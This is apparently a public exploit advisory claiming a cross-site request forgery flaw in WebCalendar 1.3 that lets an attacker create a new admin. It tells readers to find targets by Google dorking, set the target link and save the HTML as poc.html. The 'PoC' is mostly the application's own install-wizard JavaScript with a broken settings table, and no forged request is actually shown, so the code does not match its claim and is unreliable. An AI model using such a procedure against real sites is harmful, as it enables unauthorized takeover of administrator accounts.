WebCalendar 1.3 Cross Site Request Forgery – Torchsec
| # Title : WebCalendar v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |
| # Dork : WebCalendar v1.3 |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 173.
[+] Set the target site link Save changes and apply .
[+] infected file : install/index.php.
[+] http://127.0.0.1/q7.3/admin/settings.php.
[+] save code as poc.html .
[+]
"DTD/xhtml1-transitional.dtd">
function testPHPInfo() {
var url = "index.php?action=phpinfo";
window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );
}
function validate( form ) {
// Only check to make sure single-user login is specified
// if in single-user mode.
var
err = '',
form = document.form_app_settings,
listid = 0; // Find id of single user object.
for( i = 0; i < form.form_user_inc.length; i++ ) {
if( form.form_user_inc.options[i].value == 'none' )
listid = i;
}
if( form.form_user_inc.options[listid].selected ) {
if( form.form_single_user_login.value.length == 0 ) {
// No single user login specified.
alert( 'Error: You must specify a\nSingle-User Login.' );
form.form_single_user_login.focus();
return false;
}
}
if( form.form_server_url.value == '' ) {
err += "Server URL is required.\n";
form.form_server_url.select();
form.form_server_url.focus();
}
else if( form.form_server_url.value.charAt(
form.form_server_url.value.length - 1 ) != '/' ) {
err += "Server URL must end with a slash(/).\n";
form.form_server_url.select();
form.form_server_url.focus();
}
if( err != '' ) {
alert( "Error:\n\n" + err );
return false;
}
// Submit form...
form.submit();
}
function auth_handler() {
var
form = document.form_app_settings,
listid = 0; // Find id of single user object.
for( i = 0; i < form.form_user_inc.length; i++ ) {
if( form.form_user_inc.options[i].value == 'none' )
listid = i;
}
if( form.form_user_inc.options[listid].selected ) {
makeVisible( 'singleuser' );
} else {
makeInvisible( 'singleuser' );
}
}
function db_type_handler() {
var
form = document.dbform,
listid = 0,
selectvalue = form.form_db_type.value;
if( selectvalue == 'sqlite' || $db_type == 'sqlite3'
|| selectvalue == 'ibase' ) {
form.form_db_database.size = 65;
document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';
} else {
form.form_db_database.size = 20;
document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';
}
}
function chkPassword() {
var
form = document.dbform,
db_pass = form.form_db_password.value,
illegalChars = /\#/;
// Do not allow #.../\#/ would stop all non-alphanumeric.
if( illegalChars.test( db_pass ) ) {
alert( 'The password contains illegal characters.' );
form.form_db_password.select();
form.form_db_password.focus();
return false;
}
}
//]]> -->
| WebCalendar Installation Wizard Step 4 | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| This is the final step in setting up your WebCalendar Installation. | Application Settings | |||||||||||
|
||||||||||||
|
||||||||||||
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
Gloss